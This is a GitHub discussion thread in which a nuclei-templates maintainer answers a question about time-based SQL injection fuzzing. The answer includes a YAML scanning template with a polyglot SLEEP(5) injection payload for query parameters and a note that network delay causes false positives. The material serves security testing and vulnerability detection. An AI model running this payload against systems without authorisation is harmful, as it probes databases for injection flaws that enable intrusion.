### DISCUSSION TITLE
Time-based SQLi fuzzing template!

### DISCUSSION THREAD

**Discussion by nazmul-ethi** [projectdiscovery/nuclei-templates#8245] [Q&A]
How to create Time-based SQLi fuzzing template?

**Comment by princechaddha** [comment]
We have a separate repo for [fuzzing templates](https://github.com/projectdiscovery/fuzzing-templates/), you can see the example for [SQLi fuzzing templates](https://github.com/projectdiscovery/fuzzing-templates/blob/main/sqli) here.

Note: Time-Based SQLi Fuzzing templates can produce false positives because of network delay

Example:
```yaml
id: time-based-sqli-fuzzing

info:
  name: Time Based SQLi Fuzzing
  author: princechaddha
  severity: high

variables:
  sqli_payload: SLEEP(5) /*' or SLEEP(5) or '" or SLEEP(5) or "*/

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    fuzzing:
      - part: query
        fuzz:
          - "{{sqli_payload}}"

    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
```
